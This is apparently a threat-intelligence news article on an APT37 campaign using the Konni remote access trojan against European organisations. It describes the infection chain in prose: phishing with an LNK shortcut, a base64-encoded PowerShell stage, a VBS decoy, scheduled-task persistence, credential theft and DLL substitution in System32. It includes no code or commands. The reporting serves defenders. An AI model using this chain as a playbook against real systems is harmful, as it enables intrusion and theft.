Cybersecurity analysts revealed a new threat campaign attributed to the North Korean-sponsored advanced persistent threat (APT) group known as APT37. Based on reports, the sophisticated threat group targets high-value organisations in several European countries, such as Poland and the Czech Republic.
In this cybercriminal activity, the APT37 utilised the malware called Konni. Konni is a remote access trojan that can establish persistence and operate privilege escalation on infected devices.
Konni malware has been attributed to numerous North Korean threat groups for years. However, it was recently seen in a spear-phishing campaign targeting the Russian Ministry of Foreign Affairs.
The attack is an ongoing campaign monitored by different cybersecurity groups. According to these researchers, the attack shows several strategies and methods corresponding to an APT gang’s operational sophistication.
APT37 starts with the deployment of a phishing email with an attached file that contains a Word file and a Windows Shortcut.
If a user accesses the LNK file, the code will run to search for a base64-encoded PowerShell script inside the DOCX file to establish command-and-control communication. Subsequently, if the server receives a command, two added files will be called wp[.]vbs and weapon[.]doc.
Moreover, the downloaded document serves as a decoy for a VBS file to run undetected in the background to develop a scheduled task on the host. However, the adversary has already loaded the remote access trojan and established a data exchange link at this attack stage.
The RAT can also perform numerous activities such as capturing screenshots, extracting state keys kept in a local state file, stealing saved credentials, and deploying a remote interactive shell that can operate commands consistently.
In the last phase of the cybercriminal campaign, the hackers can download additional files that support the function of the altered Konni sample, retrieving them as compressed archives. These included several DLLs that substitute authentic Windows services archives like the wpcsvs in System32, which the adversaries exploit for operating commands in the operating system with admin-level privileges.
